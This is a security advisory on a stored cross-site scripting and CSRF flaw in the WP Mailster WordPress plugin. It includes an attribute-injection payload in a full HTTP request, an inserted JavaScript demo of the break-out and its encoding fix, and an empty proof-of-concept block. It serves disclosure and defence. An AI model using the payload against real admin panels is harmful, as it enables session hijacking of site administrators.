#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  WP Mailster [1]
# Vendor:   WP Mailster
# CSNC ID:  CSNC-2021-018
# CVE ID:   CVE-2021-28975
# Subject:  Cross-Site Scripting (XSS) [2] and Cross-Site Request Forgery (CSRF) [3]
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Emanuele Barbeno (advisories@compass-security.com)
# Date:     21.10.2021
#
#############################################################

Introduction:
-------------

Mailster is a mailing list plugin for WordPress. It enables you to offer
automated electronic mailing lists. [4]

Compass Security discovered a security flaw in the WP Mailster plugin which
allows injecting client-side code into the WordPress admin panel. Furthermore,
because the plugin fails to validate anti-CSRF tokens, the client-side code
injection can be exploited remotely if an admin user with a valid session
visits a malicious website on the Internet.

Affected:
---------

Vulnerable:
 * 1.6.18.0

Not Vulnerable:
 * 1.6.19.0

No other version was tested, but older versions are believed to be vulnerable
as well.

Technical Description
---------------------

The user's input data is not properly encoded when being echoed back to the
user. Therefore, this data can be interpreted as executable code by the
browser. An attacker who sets the "server_host", "server_name" or
"connection_parameter" value of a mail server to an XSS payload gets
JavaScript executed in the WordPress admin console, in the context of the
victim's browser, as soon as the victim opens that mail server's details on
the mst_servers page. The payload used below is built for an attribute
context: it closes the quoted value the plugin echoes it into and appends an
event handler attribute to the same input element.
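The following is an added example and not code from the advisory or from the WP Mailster plugin. It reproduces the attribute-context break-out described above with the exact server_host value from the request below, and applies the output encoding recommended under "Workaround / Fix" to show that the same value then stays inside the attribute. The input template is a hypothetical stand-in for the plugin's edit form; the small attribute tokenizer only mirrors the HTML parsing rules that matter here (a quoted value ends at its matching quote, an unquoted value ends at whitespace or ">", and a new attribute may start directly after a closing quote).

```javascript
// Added example, not part of the Compass advisory or the WP Mailster code base.
// The server_host value from the advisory's request, after URL decoding:
//   server_host=csnc"onfocus=alert(1);//"+autofocus=
const PAYLOAD = 'csnc"onfocus=alert(1);//" autofocus=';

// HTML encoding as listed under "Workaround / Fix" (OWASP XSS Prevention Cheat Sheet).
function encodeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')   // first, so the other replacements are not re-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hypothetical rendering of the server_host field of the mst_servers edit page.
// encode=false echoes the value raw (the tested 1.6.18.0 behaviour), encode=true
// applies attribute encoding (the fix).
function renderServerHostInput(value, encode) {
  const v = encode ? encodeHtmlAttr(value) : value;
  return `<input type="text" name="server_host" value="${v}">`;
}

// Minimal attribute tokenizer for a single start tag; returns [{name, value}, ...]
// in the order a browser would see them.
function parseAttributes(tag) {
  const inner = tag.replace(/^<[A-Za-z0-9]+/, '').replace(/\/?>$/, '');
  const ws = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r';
  const attrs = [];
  let i = 0;
  while (i < inner.length) {
    while (i < inner.length && ws(inner[i])) i++;
    if (i >= inner.length) break;
    let name = '';
    while (i < inner.length && !ws(inner[i]) && inner[i] !== '=') name += inner[i++];
    while (i < inner.length && ws(inner[i])) i++;
    let value = '';
    if (inner[i] === '=') {
      i++;
      while (i < inner.length && ws(inner[i])) i++;
      if (inner[i] === '"' || inner[i] === "'") {
        const q = inner[i++];
        while (i < inner.length && inner[i] !== q) value += inner[i++];
        i++; // consume the closing quote; the next attribute may start right here
      } else {
        while (i < inner.length && !ws(inner[i])) value += inner[i++];
      }
    }
    attrs.push({ name: name.toLowerCase(), value });
  }
  return attrs;
}

// Event-handler attributes (on*) the browser would register for the rendered tag.
function injectedHandlers(html) {
  return parseAttributes(html)
    .filter((a) => a.name.startsWith('on'))
    .map((a) => `${a.name}=${a.value}`);
}

const vulnerable = renderServerHostInput(PAYLOAD, false);
const fixed = renderServerHostInput(PAYLOAD, true);
console.log(vulnerable);
console.log(injectedHandlers(vulnerable)); // [ 'onfocus=alert(1);//"' ] plus autofocus
console.log(fixed);
console.log(injectedHandlers(fixed));      // []
```

In the raw rendering the tag ends up with five attributes (type, name, value="csnc", onfocus, autofocus), so the handler fires as soon as the page loads; after encoding it has three, and the entire payload is the literal text of the value attribute. In WordPress the same encoding is provided by esc_attr().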
The following HTTP request shows the injected XSS payload in the server_host
input parameter:

```
POST /wordpress/wp-admin/admin.php?page=mst_servers&subpage=edit&sid=2 HTTP/1.1
Host: mydomain.local
Content-Length: 226
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://mydomain.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4028.0 Safari/537.36 autochrome/red
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://mydomain.local/wordpress/wp-admin/admin.php?page=mst_servers&subpage=edit&sid=1&_wpnonce=845ead6aa9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_66e96405e885fd924bb37c24f3319402=admin%7C1615735484%7CbDVt0g2WUVCRVbuty8iHI7pYlC0KbouXa6BDhdoTuka%7Cb3c7728f6c07e8049c6e0e8a37a8035e698ed9ac6006993f93b8b4eaf8a4667e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_66e96405e885fd924bb37c24f3319402=admin%7C1615735484%7CbDVt0g2WUVCRVbuty8iHI7pYlC0KbouXa6BDhdoTuka%7C114a4995e06b2a7d23d13d2b289559678f13bac0233bf9184ce4a033041254a4; wp-settings-time-1=1615562785; PHPSESSID=3ppf9hugcjhni5gnosc0u4nfeb
Connection: close

sid=2&server_type=0&server_name=&server_host=csnc"onfocus=alert(1);//"+autofocus=&server_port=&secure_protocol=&secure_authentication=0&protocol=pop3&connection_parameter=&add_server=edit&sid=2&server_action=Update+Mail+Server
```

The HTTP response shows that the XSS payload is not encoded by the web
application, thus the payload is evaluated and executed as JavaScript code by
the browser:

```
HTTP/1.1 200 OK
Date: Fri, 12 Mar 2021 15:36:19 GMT
Server: Apache/2.4.46 (Debian)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: wp-settings-1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/wordpress/
Set-Cookie: wp-settings-time-1=1615563379; expires=Sat, 12-Mar-2022 15:36:19 GMT; Max-Age=31536000; path=/wordpress/
Vary: Accept-Encoding
Content-Length: 35286
Connection: close
Content-Type: text/html; charset=UTF-8

[CUT BY COMPASS]
[CUT BY COMPASS]
```

Furthermore, the tested version fails to validate anti-CSRF tokens: the POST
body above carries no _wpnonce parameter at all, yet the update is accepted.
This vulnerability can therefore be exploited by an external attacker hosting
the following HTML PoC code on a malicious website on the Internet. When the
victim, who has a valid admin session on the WordPress dashboard, accesses the
website hosting the PoC code, the request shown before is sent to the backend
and the XSS payload is evaluated in the victim's browser:

```
```

Workaround / Fix:
-----------------

Dangerous characters should be encoded on output according to the encoding
rules of the respective type of context. The whole code should be analyzed
for this and updated accordingly. For regular HTML body content, use HTML
encoding [5]:

 * <  ->  &lt;
 * >  ->  &gt;
 * "  ->  &quot;
 * '  ->  &#x27;
 * &  ->  &amp;

In this case the reflected values land inside quoted attribute values of the
edit form, so encoding the quote characters is what stops the break-out; in
WordPress, esc_attr() applies this encoding.

Furthermore, the application should include a random token which changes for
each user session. If the server receives a request that does not include the
correct token, it should reject it. [6]

Timeline:
---------

2021-03-12: Discovery by Emanuele Barbeno
2021-03-12: Initial vendor notification
2021-03-17: Initial vendor response
2021-04-20: Assigned CVE-2021-28975
2021-10-21: Public disclosure

References:
-----------

[1] https://wpmailster.com/
[2] https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)
[3] https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
[4] https://wpmailster.com/doc/introduction/
[5] https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
[6] https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html